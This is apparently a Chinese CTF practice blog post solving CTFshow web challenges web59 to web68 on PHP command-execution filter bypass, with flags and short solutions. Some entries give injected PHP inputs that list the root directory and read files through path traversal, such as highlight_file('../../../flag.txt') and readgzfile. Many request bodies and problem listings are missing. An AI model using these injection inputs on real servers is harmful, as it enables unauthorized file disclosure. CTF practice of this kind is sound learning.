CTF-ctfshow_Web入门_命令执行4
题目来源:CTFshow
练习时间:2026年2月9日
练习数量:10
上篇博客链接:
CTF-ctfshow_Web入门_命令执行3
⭐️ 31 web59
🚩flag:ctfshow{68862ff0-59ce-4fd3-8025-deba7c1de8de}
💡hint:Web 命令执行(Command Injection) 过滤绕过
题目:
|
同上题:
POST / HTTP/1.1 |
⭐️ 32 web60
🚩flag:ctfshow{e7842818-6554-41e3-a0b8-5a7374694589}
💡hint:Web 命令执行(Command Injection) 过滤绕过
题目:
|
为什么是一样的题目呢。。
同上题:
POST / HTTP/1.1 |
⭐️ 33 web61
🚩flag:ctfshow{63bc8060-b842-4647-ad0f-a5df78ffda3f}
💡hint:Web 命令执行(Command Injection) 过滤绕过
|
为什么还是一样的题目呢。。
同上题:
POST / HTTP/1.1 |
⭐️ 34 web62
🚩flag:ctfshow{3d9a3d94-8773-46d5-b07a-01ce93db4ea6}
💡hint:Web 命令执行(Command Injection) 过滤绕过
|
还还还是一样 没招了
同上题:
POST / HTTP/1.1 |
⭐️ 35 web63
🚩flag:ctfshow{7dc51247-8dc6-4a60-9460-62ba0124f1bd}
💡hint:Web 命令执行(Command Injection) 过滤绕过
|
还还还是一样 没招了
同上题:
POST / HTTP/1.1 |
⭐️ 36 web64
🚩flag:ctfshow{0e297d1c-37ad-4482-8da1-dadfc684c479}
💡hint:Web 命令执行(Command Injection) 过滤绕过
|
还还还是一样 没招了
同上题:
POST / HTTP/1.1 |
⭐️ 37 web65
🚩flag:ctfshow{39243ef1-5c4d-4876-b854-a15484bde24c}
💡hint:Web 命令执行(Command Injection) 过滤绕过
|
还还还是一样 没招了
同上题:
POST / HTTP/1.1 |
⭐️ 38 web66
🚩flag:ctfshow{2eb95fcc-f59f-411c-a64c-22495cec45a0}
💡hint:Web 命令执行(Command Injection) 过滤绕过
|
还还还是一样 没招了
同上题:
POST / HTTP/1.1 |
好吧 这次不一样了。
先查看根目录内容:
c=print_r(scandir("/")); |
得到:Array ( [0] => . [1] => .. [2] => .dockerenv [3] => bin [4] => dev [5] => etc [6] => flag.txt [7] => home [8] => lib [9] => media [10] => mnt [11] => opt [12] => proc [13] => root [14] => run [15] => sbin [16] => srv [17] => sys [18] => tmp [19] => usr [20] => var )
于是用查看根目录的:
c=highlight_file("../../../flag.txt"); |
⭐️ 39 web67
🚩flag:ctfshow{95b8ae7e-ca49-4290-bc3f-a6225c4e55c4}
💡hint:Web 命令执行(Command Injection) 过滤绕过
|
老规矩,先尝试:
POST / HTTP/1.1 |
不在这里,然后尝试查看根目录内容
print_r被禁用了,尝试var_dump
POST / HTTP/1.1 |
还是得到:
array(21) { [0]=> string(1) “.” [1]=> string(2) “..” [2]=> string(10) “.dockerenv” [3]=> string(3) “bin” [4]=> string(3) “dev” [5]=> string(3) “etc” [6]=> string(8) “flag.txt” [7]=> string(4) “home” [8]=> string(3) “lib” [9]=> string(5) “media” [10]=> string(3) “mnt” [11]=> string(3) “opt” [12]=> string(4) “proc” [13]=> string(4) “root” [14]=> string(3) “run” [15]=> string(4) “sbin” [16]=> string(3) “srv” [17]=> string(3) “sys” [18]=> string(3) “tmp” [19]=> string(3) “usr” [20]=> string(3) “var” }
还是在一样的位置,用同样的命令就好了
c=highlight_file(“../../../flag.txt”);
⭐️ 40 web68
🚩flag:ctfshow{29a2f685-fdb5-48a6-b03b-2e918a13fc47}
💡hint:命令执行 POST
|
c=var_dump(scandir(“/“)); c=readgzfile(“/flag.txt”);
今日份结束🔚
